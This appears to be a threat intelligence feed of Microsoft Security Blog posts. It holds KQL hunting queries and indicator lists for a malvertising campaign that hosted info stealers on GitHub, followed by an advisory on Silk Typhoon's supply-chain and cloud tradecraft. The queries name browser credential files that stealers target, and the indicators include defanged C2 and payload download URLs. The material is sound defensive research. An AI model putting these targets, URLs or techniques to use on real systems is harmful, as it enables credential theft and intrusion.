DeviceEvents | where ActionType == "DpapiAccessed" | where InitiatingProcessFileName has_any ("RegAsm.exe", "MSBuild.exe") | where (AdditionalFields has_any("Google Chrome", "Microsoft Edge") and AdditionalFields has_any("SPCryptUnprotect")) | extend json = parse_json(AdditionalFields) | extend dataDesp = tostring(json.DataDescription.PropertyValue) | extend opType = tostring(json.OperationType.PropertyValue) | where (dataDesp in~ ("Google Chrome", "Microsoft Edge") and opType =~ "SPCryptUnprotect") | project Timestamp, ReportId, DeviceId, ActionType, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, AdditionalFields, dataDesp, opType

Sensitive browser file access via AutoIT

Identify AutoIT scripts (renamed or otherwise) accessing sensitive browser files.

let browserDirs = pack_array(@"\Google\Chrome\User Data\", @"\Microsoft\Edge\User Data\", @"\Mozilla\Firefox\Profiles\"); let browserSensitiveFiles = pack_array("Web Data", "Login Data", "key4.db", "formhistory.sqlite", "cookies.sqlite", "logins.json", "places.sqlite", "cert9.db"); DeviceEvents | where AdditionalFields has_any ("FileOpenSource") // Filter for "File Open" events. | where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe" | where (AdditionalFields has_any(browserDirs) or AdditionalFields has_any(browserSensitiveFiles)) | extend json = parse_json(AdditionalFields) | extend File_Name = tostring(json.FileName.PropertyValue) | where (File_Name has_any (browserDirs) and File_Name has_any (browserSensitiveFiles)) | project Timestamp, ReportId, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, File_Name

Sensitive browser file access via LOLBAS binaries

Identify LOLBAS binaries (RegAsm.exe and MSBuild.exe) accessing sensitive browser files.

let browserDirs = pack_array(@"\Google\Chrome\User Data\", @"\Microsoft\Edge\User Data\", @"\Mozilla\Firefox\Profiles\"); let browserSensitiveFiles = pack_array("Web Data", "Login Data", "key4.db", "formhistory.sqlite", "cookies.sqlite", "logins.json", "places.sqlite", "cert9.db"); DeviceEvents | where AdditionalFields has_any ("FileOpenSource") // Filter for "File Open" events. | where InitiatingProcessFileName has_any ("RegAsm.exe", "MSBuild.exe") | where (AdditionalFields has_any(browserDirs) or AdditionalFields has_any(browserSensitiveFiles)) | extend json = parse_json(AdditionalFields) | extend File_Name = tostring(json.FileName.PropertyValue) | where (File_Name has_any (browserDirs) and File_Name has_any (browserSensitiveFiles)) | project Timestamp, ReportId, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, File_Name Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Indicators of compromise

Streaming website domains with malicious iframe

Indicator Type movies7[.]net Domain 0123movie[.]art Domain

Malicious iframe redirector domains

Indicator Type fle-rvd0i9o8-moo[.]com Domain 0cbcq8mu[.]com Domain

Malvertisement distributor

Indicator Type widiaoexhe[.]top Domain

Malvertising website domains

Indicator Type widiaoexhe[.]top Domainpredictivdisplay[.]com Domainbuzzonclick[.]com Domainpulseadnetwork[.]com Domainonclickalgo[.]comDomainliveadexchanger[.]comDomaingreatdexchange[.]comDomaindexpredict[.]comDomainonclickperformance[.]comDomain

GitHub referral URLs

Indicator Type hxxps://pmpdm[.]com/webcheck35/URLhxxps://startherehosting[.]net/todaypage/URLhxxps://kassalias[.]com/pageagain/URLhxxps://sacpools[.]com/pratespage/URLhxxps://dreamstorycards[.]com/amzpage/URLhxxps://primetimeessentials[.]com/newpagyes/URLhxxps://razorskigrips[.]com/perfect/URLhxxps://lakeplacidluxuryhomes[.]com/webpage37URLhxxps://ageless-skincare[.]com/gn/URLhxxps://clarebrownmusic[.]com/goodday/URLhxxps://razorskigrips[.]com/gn/URLhxxps://compass-point-yachts[.]com/nicepage77/pro77.phpURLhxxps://razorskigrips[.]com/goodk/URLhxxps://lilharts[.]com/propage6/URLhxxps://enricoborino[.]com/propage66/URLhxxps://afterpm[.]com/pricedpage/URLhxxps://eaholloway[.]com/updatepage333/URLhxxps://physicaltherapytustin[.]com/webhtml/URLhxxps://physicaltherapytustin[.]com/web-X/URLhxxps://razorskigrips[.]com/newnewpage/URLhxxps://statsace[.]com/web_us/URLhxxps://nationpains[.]com/safeweb3/URLhxxps://vjav[.]com/URLhxxps://thegay[.]com/URLhxxps://olopruy[.]com/URLhxxps://desi-porn[.]tube/URLhxxps://cumpaicizewoa[.]net/partitial/URLhxxps://ak.ptailadsol[.]net/partitial/URLhxxps://egrowz[.]com/webview/URLhxxps://or-ipo[.]com/nice/URL

GitHub URLs

Indicator Type hxxps://github[.]com/down4up/ URLhxxps://github[.]com/g1lsetup/iln77URLhxxps://github[.]com/g1lsetup/v2025URLhxxps://github[.]com/git2312now/DownNew152/URLhxxps://github[.]com/muhammadshahblis/URLhxxps://github[.]com/JimelecarURLhxxps://github[.]com/kloserwURLhxxps://github[.]com/kopersparan/URLhxxps://github[.]com/zotokilowaURLhxxps://github[.]com/colvfile/bmx84542URLhxxps://github[.]com/colvfile/yesyes333URLhxxps://github[.]com/mp3andmovies/URLhxxps://github[.]com/anatfile/newlURLhxxps://github[.]com/downloadprov/wwwURLhxxps://github[.]com/abdfilesup/readyyesURLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/898537481URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/898072392/ URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/902107140URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/902405338URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/901430321/URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/903047306/URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/899121225URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/899472962/URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/900979287/URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/901553970URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/901617842/URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/897657726URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/903499100/URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/903509708/URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/915668132/URL

DropBox URL

Indicator Type hxxps://uc8ce1a0cf2efa109cd4540c0c22.dl.dropboxusercontent[.]com/cd/0/get/CgHUWBzFWtX1ZE6CwwKXVb1EvW4tnDYYhbX8Iqj70VZ5e2uwYlkAq6V-xQcjX0NMjbOJrN3_FjuanOjW66WdjPHNw2ptSNdXZi4Sey6511OjeNGuzMwxtagHQe5qFOFpY2xyt1sWeMfLwwHkvGGFzcKY/file?dl=1# URL

Discord URL

Indicator Typehxxps://cdn.discordapp[.]com/attachments/1316109420995809283/1316112071376769165/NativeApp_G4QLIQRa.exe URL

First stage GitHub-hosted payloads

FilenameSHA-256NanoPhanoTool.execd207b81505f13d46d94b08fb5130ddae52bd1748856e6b474688e590933a718Squarel_JhZjXa.exeb87ff3da811a598c284997222e0b5a9b60b7f79206f8d795781db7b2abd41439PriceApp_1jth1MMk.exeef2d8f433a896575442c13614157261b32dd4b2a1210aca3be601d301feb1fefParanoide.exe5550ea265b105b843f6b094979bfa0d04e1ee2d1607b2e0d210cd0dea8aab942AliasApp.exe0c2d5b2a88a703df4392e060a7fb8f06085ca3e88b0552f7a6a9d9ef8afdda03X-essentiApp.exed8ae7fbb8db3b027a832be6f1acc44c7f5aebfdcb306cd297f7c30f1594d9c45QilawatProtone.exe823d37f852a655088bb4a81d2f3a8bfd18ea4f31e7117e5713aeb9e0443ccd99ElectronApp.exe588071382ac2bbff6608c5e7f380c8f85cdd9e6df172c5edbdfdb42eb74367dcNativeApp_dRRgoZqi.exedd8ce4a2fdf4af4d3fc4df88ac867efb49276acdcacaecb0c91e99110477dbf2NativeApp_G5L1NHZZ.exe380920dfcdec5d7704ad1af1ce35feba7c3af1b68ffa4588b734647f28eeabb7NativeApp_86hwwNjq.exe96cc7c9fc7ffbda89c920b2920327a62a09f8cb4fcf400bbfb02de82cdd8dba1NativeApp_01C02RhQ.exe800c5cd5ec75d552f00d0aca42bdade317f12aa797103b9357d44962e8bcd37aApp_aeIGCY3g.exeafdc1a1e1e934f18be28465315704a12b2cd43c186fbee94f7464392849a5ad0Pictore.exede6fcdf58b22a51d26eacb0e2c992d9a894c1894b3c8d70f4db80044dacb7430ScenarioIT.exef677be06af71f81c93b173bdcb0488db637d91f0d614df644ebed94bf48e6541CiscoProton.exe7b88f805ed46f4bfc3aa58ef94d980ff57f6c09b86c14afa750fc41d32b7ada8Alarmer.exedc8e5cae55181833fa9f3dd0f9af37a2112620fd47b22e2fd9b4a1b05c68620fAevellaAi.2.exe3e8ef8ab691f2d5b820aa7ac805044e5c945d8adcfc51ee79d875e169f925455avs.exed2e9362ae88a795e6652d65b9ae89d8ff5bdebbfec8692b8358aa182bc8ce7a4mrg.exe113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1mrg.exe732b4874ac1a1d4326fc1d71d16910fce2835ceb87e76ad4ef2e40b1e948a6ccApplication.exeaea0892bf9a533d75256212b4f6eaede2c4c9e47f0725fc3c61730ccfba25ec8Application.exeea2e21d0c09662a0f9b42d95ce706b5ed26634f20b9b5027ec681635a4072453SalmonSamurai.exe83679dfd6331a0a0d829c0f3aed5112b69a7024ff1ceebf7179ba5c2b4d21fc5Arendada.exe47ef2b7e8f35167fab1ecdd5ddb73d41e40e6a126f4da7540c1c0394195cb3dfArduino.exe92d457b286fb63d2f5ec9413fd234643448c5f8d2c0763e43ed5cf27ab47eb02SecondS.exe9d5c551f076449af0dbd7e05e1c2e439d6f6335b3dd07a8fa1b819c250327f39ultraedit.msi0e20bea91c3b70259a7b6eef3bff614ce9b6df25e078bc470bfef9489c9c76e6

First-stage Dropbox-hosted payload

FilenameSHA-256App_File-x38.3.exec0bc1227bdc56fa601c1c5c0527a100d7c251966e40b2a5fa89b39a2197dda67

First-stage Discord-hosted payload

FilenameSHA-256NativeApp_G4QLIQRa.exe87200e8b43a6707cd66fc240d2c9e9da7f3ed03c8507adf7c1cfe56ba1a9c57d

Certificate signatures of GitHub-hosted payloads

Indicator c855f7541e50c98a5ae09f840fa06badb97ab46c94c21e6384f2ffb72bd856c1c40b788f314b529874df2582af3780d81a8071e260c2b04259efc35a07728484b1bb8702a87c6e5a154e0d690af2ff38901f3fe4e599cd155132ce2b6bf3c5f6d1e0387cbe7156bd07dd7f72521fae4a3d6f46c48dd2ce9e686b7ebba606303b5085633fcaa0685272b4d9b974a8215a54f52f792d351d66bd56a0ac626474fb561620a3f0bf4fb96898a99252b85b00c468e5af8137f599ac036b0eaae9486158e40e90ebdbce94E9007755cfe5643d18618786de1995914098307f

Certificate signature of Dropbox-hosted payload

Indicator fa6146f1fdad58b8db08411c459cb70acf82846d

Second-stage payloads

File nameSHA-256NanoTool.exe9f958b85dc42ac6301fe1abfd4b11316b637c0b8c0bf627c9b141699dc18e885Squarel.exe29539039c19995d788f24329ebb960eaf5d86b1f8df76272284d08a63a034d42ParanoidResolver.exe1f73a00b5a7ac31ffc89abbedef17ee2281cf065423a3644787f6c622295ff29AliasInstall.exe997671c13bb78a9acc658e2c3a1abf06aedc4f1f4f1e5fd8d469a912fc93993bIoNixNginx.exe1d8ab53874b2edfb058dd64da8a61d92c8a8e302cc737155e0d718dbe169ba36QilawatProton.exe 885f8a704f1b3aaa2c4ddf7eab779d87ecb1290853697a1e6fb6341c4f825968ProtonEditor.exe48f422bf2b878d142f376713a543d113e9f964f6761d15d4149a4d71441739e5AlEditor.exe 9daa63046978d7097ea20bfbb543d82374cf44ba37f966b87488f63daf20999eScielfic.exe6ec86b4e200144084e07407200a5294985054bdaddb3d6c56358fc0657e48157Pictore.exe18959833da3df8d5d8d19c3fce496c55aa70140824d3a942fe43d547b9a8c065AlarmWalker Solid.exe552f23590bdf301f481e62a9ce3c279bab887d64f4ba3ea3d81a348e3eff6c45Aevella.exe 2a738f41b42f47b64be7dc2d16a4068472b860318537b5076814891a7d00b3bbApplication.exe5b50d0d67db361da72af2af20763b0dde9e5e86b792676acb9750f32221e955cArchiverApp.execfeac95017edbfe9a0ad8f24e7539f54482012d11dc79b7b6f41ff4ff742d9c6LakerBaker.exeaf7454ca632dead16a36da583fb89f640f70df702163f5a22ba663e985f80d88NanoTool.exeefdcd37ee0845e0145084c2a10432e61b1b4bf6b44ecd41d61a54b10e3563650DisplayPhotoViewer.exe86ae0078776c0411504cf97f4369512013306fcf568cc1dc7a07e180dde08edaCheryLady Application.exe773d3cb5edef063fb5084efcd8d9d7ac7624b271f94706d4598df058a89f77fdSalmonSamurai.exe40abba1e7da7b3eaad08a6e3be381a9fc2ab01b59638912029bc9a4aa1e0c7a7Heaveen Application.exe39dbf19d5c642d48632bfaf2f83518cfbd2b197018642ea1f2eb3d81897cf17dCisco Application.exe234971ecd1bf152c903841fac81bdaa288954a2757a73193174cde02fa6f937bSimplify.exe221615de3d66e528494901fb5bd1725ecda336af33fe758426295f659141b931SecondS.tmp5185f953be3d0842416d679582b233fdc886301441e920cb9d11642b3779d153

Second-stage C2s

Indicator Type 159.100.18[.]192 C2192.142.10[.]246 C279.133.46[.]35C284.200.24[.]191C284.200.24[.]26C289.187.28[.]253 C2185.92.181[.]1C2188.245.94[.]250 C2

Third-stage payloads: .exe and PowerShell files

File nameSHA-256ApproachAllan.exe4e5fafffb633319060190a098b9ea156ec0243eb1279d78d27551e507d937947DiscoConvicted.exe008aed5e3528e2c09605af26b3cda88419efb29b85ed122cab59913c18f7dc75AwesomeTrader.exe21d4252a6492270f24282f8de9e985c9b8c61412f42d169ff4b128fd689d4753CiteLips.exec9713c06526673bf18dbdaf46ea61ca9dd8fefe8ceec3be06c63db17e01e3741RepublicChoir.exef649f66116a3351b60aa914e0b1944c2181485b1cf251fc9c1f6dab8a9db426b6Zh7MvxYtHTBFX90Mn.exeb96360d48c2755ded301dd017b37dfdce921bdea7731c4b31958d945c8a0b8f5ExclusivePottery.exe54c8a4f58b548c0cf6dbea2522e258723263ccde11d23e48985bdd1fd3535ce2squarel.ps1d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbbMadCountries.exe9fe2c00641ece18898267b3c6e4ee0cb82ffefbc270c0767c441c3f38b63a12aHockeyTract.exef136fa82ff73271708afe744f4e6a19cd5039e08ecd3ddad8e4d238f338f4d58BruneiPlugins.exe453de65c9cc2dc62a67c502cd8bc26968acad9a671c1e095312c1fa6db4a7c74CnnCylinder.exea76548a500d81dbb6f50419784a9b0323f5e42245ac7067af2adee0558167116specreal.ps1d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbbInflationWinston.exedfbba64219fc63815db538ae8b51e07ec7132f4b39ba4a556c64bd3a5f024c2dnetsup.ps1 d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbbCfUltra.exe7880714c47260dba1fd4a4e4598e365b2a5ed0ad17718d8d192d28cf75660584CalvinShoppercom.exe345a898d5eab800b7b7cbd455135c5474c5f0a9c366df3beb110f225ba734519EscortUnavailable.exe258efd913cccdb70273c9410070f093337d5574b74c683c1cdff33baff9ffd7cDisagreeProceed.exe9c82a2190930ec778688779a5ad52537d8b0856c8142c71631b308f1f8f0e772BarbieBiblical.exe34f43bfc0a6f0d0f70b6eee0fa29c6dc62596ab2b867bbabd27c68153ea47f24MysqlManaging.exeef1f9d507a137a4112ac92c576fc44796403eb53d71fe2ddb00376419c8a604ePillsHarvest.exe4af3898ba3cf8b420ea1e6c5ce7cdca7775a4c9b78f67b493a9c73465432f1d3BelfastProt.exead470bffbd120fc3a6c2c2e52af3c12f9f0153e76fee5e2b489a3d1870bdff03HowardLikelihood.execc08892ace9ac746623b9d0178cd4d149f6a9ab10467fb9059d16f2c0038dcf9SorryRequiring.exe4a2346d453b2ac894b67625640347c15e74e3091a9aa15629c3a808caaff1b2bSearchMed.exeb0aab51b5e4a9cdd5b3d2785e4dea1ec06b20bc00e4015ccd79e0ba395a20fbdRepublicChoir.exef649f66116a3351b60aa914e0b1944c2181485b1cf251fc9c1f6dab8a9db426bDesignersCrawford.exee8452a65a452abdb4b2e629f767a038e0792e6e2393fb91bf17b27a0ce28c936HumanitarianProvinces.exe25cfd6e6a9544990093566d5ea9d7205a60599bfda8c0f4d59fca31e58a7640bResetEngaging.exe51fbc196175f4fb9f38d843ee53710cde943e5caf1b0552624c7b65e6c231f7eEducationalDerby.exe4a9a8c46ff96e4f066f51ff7e64b1c459967e0cdeb74b6de02cf1033e31c1c7bStringsGrill.exef2a8840778484a56f1215f0fa8f6e8b0fb805fce99e62c01ff0a1f541f1d6808CongressionalMechanics.exe2060509a63180c2f5075faf88ce7079c48903070c1c6b09fa3f9d6db05b8d9daSexuallyWheat.exed39075915708d012f12b7410cd63e19434d630b2b7dbe60bd72ce003cd2efeafPerceptionCircuits.exe0e7dd3aa100d9e22d367cb995879ac4916cb4feb1c6085e06139e02cc7270bbaWWv63SKrHflebBd4VW.ps1483796a64f004a684a7bc20c1ddd5c671b41a808bc77634112e1703052666a64WritingsShanghai.exefa131ea3ce9a9456e1d37065c7f7385ce98ffa329936b5fdd0fd0e78ade88ecbIUService.exed5a6714ab95caa92ef1a712465a44c1827122b971bdb28ffa33221e07651d6f7RttHlp.exe8aed681ad8d660257c10d2f0e85ae673184055a341901643f27afc38e5ef8473ASmartService.exe75712824b916c1dc8978f65c060340dc69b1efa0145dddbf54299689b9f4a118ClaireSpecifically.exe746abef4bde48da9f9bff3c23dd6edf8f1bea4b568df2a7d369cb30536ec9ce0report.exe6daccc09f5f843b1fa4adde64ad282511f591a641cb474e123fed922167df6aexh6yIa7PXFCsasc0H5.exe5f17501193f5f823f419329bc20534461a7195aa4c456e27af6b0df5b0788041yL6Iwcawoz3KDjg60m.exe5ecb4240fae36893973fb306c52c7e548308ebcfba6d101aad4e083407968a96CustomsCampbell.exe5b80c7d65bb655ccb6e3264f4459a968edcda28084e0ddde16698f642b2d7d83HoldemRover.exe4c60cdd1ee4045eb0b3bfda8326802d17565f3d1ff6829ac05775ebc6d9ca2dcQUCvpZLobnhvno5v1t.exe4bac608722756c80c29fee6f73949c011ea78243e5267e86b7b20b3beeb79f9eEmilyHaiti.exe3221f1356a91d4f06d1deee988be04597cc11bc1cab199ba9c43b9d80dfa88bdPIPIPOO.exe15bf7a141a5a5e7e5c19ffbfbb5b781ae8db52d9ba5ffeb1364964580ed55b13ReliefOrganizational.exe02533f92d522d47b9d630375633803dd8d6b4723e87d914cd29460d404134a66HelloWorld.ps1670218cfc5c16d06762b6bc74cda4902087d812e72c52d6b9077c4c416485251.zip0997201124780f11a16662a0d718b1a3ef3202c5153191f93511d7ecd0de4d8d251.exe4b50e7fba5e33bac30b98494361d5ab725022c38271b3eb89b9c4aab457dca78

Fourth-stage AutoIT, NetSupport RAT, PowerShell, and Lumma

File name(s)SHA-256Korea.com
Fabric.com
Affiliated.com
Weeks.com
Briefly.com
Denmark.com
Tanzania.com
Cookies.com
Spice.com
SophieHub.scr
SpaceWarp.scr
SkillSync.scr
Quantify.scr
HealthPulse
CogniFlow.scr
ArgonautGuard.scr865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4Warrant.com
Ford.com
AutoIt3.exe
Seq.com
Underwear.com1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49Presentationhost.exe18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2derLX7UsT.ps12a29c9904d1860ea3177da7553c8b1bf1944566e5bc1e71340d9e0ff079f0bd3675aff18abddc.exeadf5a9c2db09a782b3080fc011d45eb6eb597d8b475c3c27755992b1d7796e91675aff18abddc.vbs5f2b66cf3370323f5be9d7ed8a0597bffea8cc1f76cd96ebb5a8a9da3a1bdc71251.exe707a23dcd031c4b4969a021bc259186ca6fd4046d6b7b1aaffc90ba40b2a603b

Third-stage C2s

Indicator Typehxxp://keikochio[.]com/staz/gribs.zip C2hxxp://keikochio[.]com/incall.php?=compName=<computer name> C2hxxps://stocktemplates[.]net/input.php?compName=<computer name> C2hxxp://89.23.96[.]126/?v=3&event=ready&url=hxxp://188.245.94[.]250:443/auto/28cd7492facfd54e11d48e52398aefa7/251.exe C2

Fourth-stage C2s

Indicator Type 45.141.84[.]60 IP address91.202.233[.]18 IP address154.216.20[.]131 IP address5.10.250[.]240 IP address79.132.128[.]77 IP addresshxxps://shortlearn[.]clickURLhxxps://wrathful-jammy[.]cyouURLhxxps://mycomp[.]cyouURLhxxps://kefuguy[.]shopURLhxxps://lumdukekiy[.]shopURLhxxps://lumquvonee[.]shopURLhxxps://klipcatepiu0[.]shopURLhxxps://gostrm[.]shopURLhxxps://ukuhost[.]netURLhxxps://silversky[.]clubURLhxxps://pub.culture-quest[.]shopURLhxxps://se-blurry[.]bizURLhxxps://zinc-sneark[.]bizURLhxxps://dwell-exclaim[.]bizURLhxxps://formy-spill[.]bizURLhxxps://covery-mover[.]bizURLhxxps://dare-curbys[.]bizURLhxxps://impend-differ[.]bizURLhxxps://dreasd[.]xyzURLhxxps://ikores[.]sbsURLhxxps://violettru[.]clickURLhxxps://marshal-zhukov[.]comURLhxxps://tailyoveriw[.]myURL

Fourth-stage testing connectivity sites

Indicator Type hxxps://baidu.comURLhxxps://360.netURLhxxps://praxlonfire73.liveURL References

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

Hear more about this discovery and how threat actors in this campaign leverage trusted platforms and advanced techniques to achieve their malicious goals in this episode of the Microsoft Threat Intelligence podcast, hosted by Sherrod DeGrippo: https://thecyberwire.com/podcasts/microsoft-threat-intelligence/39/notes. To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Malvertising campaign leads to info stealers hosted on GitHub appeared first on Microsoft Security Blog.

Categories: Microsoft

Silk Typhoon targeting IT supply chain

Microsoft Malware Protection Center - Wed, 03/05/2025 - 6:00am

Executive summary:
Microsoft Threat Intelligence identified a shift in tactics by Silk Typhoon, a Chinese espionage group, now targeting common IT solutions like remote management tools and cloud applications to gain initial access. While they haven’t been observed directly targeting Microsoft cloud services, they do exploit unpatched applications that allow them to elevate their access in targeted organizations and conduct further malicious activities. After successfully compromising a victim, Silk Typhoon uses the stolen keys and credentials to infiltrate customer networks where they can then abuse a variety of deployed applications, including Microsoft services and others, to achieve their espionage objectives. Our latest blog explains how Microsoft security solutions detect these threats and offers mitigation guidance, aiming to raise awareness and strengthen defenses against Silk Typhoon’s activities.

Silk Typhoon is an espionage-focused Chinese state actor whose activities indicate that they are a well-resourced and technically efficient group with the ability to quickly operationalize exploits for discovered zero-day vulnerabilities in edge devices. This threat actor holds one of the largest targeting footprints among Chinese threat actors. Part of this is due to their opportunistic nature of acting on discoveries from vulnerability scanning operations, moving quickly to the exploitation phase once they discover a vulnerable public-facing device that they could exploit.

As a result, Silk Typhoon has been observed targeting a wide range of sectors and geographic regions, including but not limited to information technology (IT) services and infrastructure, remote monitoring and management (RMM) companies, managed service providers (MSPs) and affiliates, healthcare, legal services, higher education, defense, government, non-governmental organizations (NGOs), energy, and others located in the United States and throughout the world.

Silk Typhoon has shown proficiency in understanding how cloud environments are deployed and configured, allowing them to successfully move laterally, maintain persistence, and exfiltrate data quickly within victim environments. Since Microsoft Threat Intelligence began tracking this threat actor in 2020, Silk Typhoon has used a myriad of web shells that allow them to execute commands, maintain persistence, and exfiltrate data from victim environments.

As with any observed nation-state threat actor activity, Microsoft has directly notified targeted or compromised customers, providing them with important information needed to secure their environments. We’re publishing this blog to raise awareness of Silk Typhoon’s recent and long-standing malicious activities, provide mitigation and hunting guidance, and help disrupt operations by this threat actor.

Recent Silk Typhoon activity Supply chain compromise

Since late 2024, Microsoft Threat Intelligence has conducted thorough research and tracked ongoing attacks performed by Silk Typhoon. These efforts have significantly enhanced our understanding of the actor’s operations and uncovered new tradecraft used by the actor. In particular, Silk Typhoon was observed abusing stolen API keys and credentials associated with privilege access management (PAM), cloud app providers, and cloud data management companies, allowing the threat actor to access these companies’ downstream customer environments. Companies within these sectors are possible targets of interest to the threat actor. The observations below were observed once Silk Typhoon successfully stole the API key:

Silk Typhoon used stolen API keys to access downstream customers/tenants of the initially compromised company.
Leveraging access obtained via the API key, the actor performed reconnaissance and data collection on targeted devices via an admin account. Data of interest overlaps with China-based interests, US government policy and administration, and legal process and documents related to law enforcement investigations.
Additional tradecraft identified included resetting of default admin account via API key, web shell implants, creation of additional users, and clearing logs of actor-performed actions.
Thus far the victims of this downstream activity were largely in the state and local government, and the IT sector.

Password spray and abuse

Silk Typhoon has also gained initial access through successful password spray attacks and other password abuse techniques, including discovering passwords through reconnaissance. In this reconnaissance activity, Silk Typhoon leveraged leaked corporate passwords on public repositories, such as GitHub, and were successfully authenticated to the corporate account. This demonstrates the level of effort that the threat actor puts into their research and reconnaissance to collect victim information and highlights the importance of password hygiene and the use of multifactor authentication (MFA) on all accounts.

Silk Typhoon TTPs Initial access

Silk Typhoon has pursued initial access attacks against targets of interest through development of zero-day exploits or discovering and targeting vulnerable third-party services and software providers. Silk Typhoon has also been observed gaining initial access via compromised credentials. The software or services targeted for initial access focus on IT providers, identity management, privileged access management, and RMM solutions.

In January 2025, Silk Typhoon was also observed exploiting a zero-day vulnerability in the public facing Ivanti Pulse Connect VPN (CVE-2025-0282). Microsoft Threat Intelligence Center reported the activity to Ivanti, which led to a rapid resolution of the critical exploit, significantly reducing the period that highly skilled and sophisticated threat actors could leverage the exploit.

Lateral movement to cloud

Once a victim has been successfully compromised, Silk Typhoon is known to utilize common yet effective tactics to move laterally from on-premises environments to cloud environments. Once the threat actor has gained access to an on-premises environment, they look to dump Active Directory, steal passwords within key vaults, and escalate privileges. Furthermore, Silk Typhoon has been observed targeting Microsoft AADConnect servers in these post-compromise activities. AADConnect (now Entra Connect) is a tool that synchronizes on-premises Active Directory with Entra ID (formerly Azure AD). A successful compromise of these servers could allow the actor to escalate privileges, access both on-premises and cloud environments, and move laterally.

Manipulating service principals/applications

While analyzing post-compromise tradecraft, Microsoft identified Silk Typhoon abusing service principals and OAuth applications with administrative permissions to perform email, OneDrive, and SharePoint data exfiltration via MSGraph. Throughout their use of this technique, Silk Typhoon has been observed gaining access to an application that was already consented within the tenant to harvest email data and adding their own passwords to the application. Using this access, the actors can steal email information via the MSGraph API. Silk Typhoon has also been observed compromising multi-tenant applications, potentially allowing the actors to move across tenants, access additional resources within the tenants, and exfiltrate data.

If the compromised application had privileges to interact with the Exchange Web Services (EWS) API, the threat actors were seen compromising email data via EWS.

In some instances, Silk Typhoon was seen creating Entra ID applications in an attempt to facilitate this data theft. The actors would typically name the application in a way to blend into the environment by using legitimate services or Office 365 themes.

Use of covert networks

Silk Typhoon is known to utilize covert networks to obfuscate their malicious activities. Covert networks, tracked by Microsoft as “CovertNetwork”, refer to a collection of egress IPs consisting of compromised or leased devices that may be used by one or more threat actors. Silk Typhoon was observed utilizing a covert network that is comprised of compromised Cyberoam appliances, Zyxel routers, and QNAP devices. The use of covert networks has become a common tactic among various threat actors, particularly Chinese threat actors.

Historical Silk Typhoon zero-day exploitation

Since 2021, Silk Typhoon has been observed targeting and compromising vulnerable unpatched Microsoft Exchange servers, GlobalProtect Gateway on Palo Alto Networks firewalls, Citrix NetScaler appliances, Ivanti Pulse Connect Secure appliances, and others. While not exhaustive, below are historical zero-day vulnerabilities that Silk Typhoon was observed compromising for initial access into victim environments.

GlobalProtect Gateway on Palo Alto Networks Firewalls

In March 2024, Silk Typhoon used a zero-day exploit for CVE-2024-3400 in GlobalProtect Gateway on Palo Alto Networks firewalls to compromise multiple organizations:

CVE-2024-3400 – A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.

Citrix NetScaler ADC and NetScaler Gateway

In early 2024, Microsoft began to observe Silk Typhoon compromising zero-day vulnerabilities within Citrix NetScaler ADC and NetScaler Gateways:

CVE-2023-3519 – An unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway

Microsoft Exchange Servers

In January 2021, Microsoft began to observe Silk Typhoon compromising zero-day vulnerabilities in Microsoft Exchange Servers. Upon discovery, Microsoft addressed those issues and issued security updates along with related guidance (related links below):

CVE-2021-26855 – A server-side request forgery (SSRF) vulnerability in Exchange that could allow an attacker to send arbitrary HTTP requests and authenticate as the Exchange server.
CVE-2021-26857 – An insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave Silk Typhoon the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to be exploited.
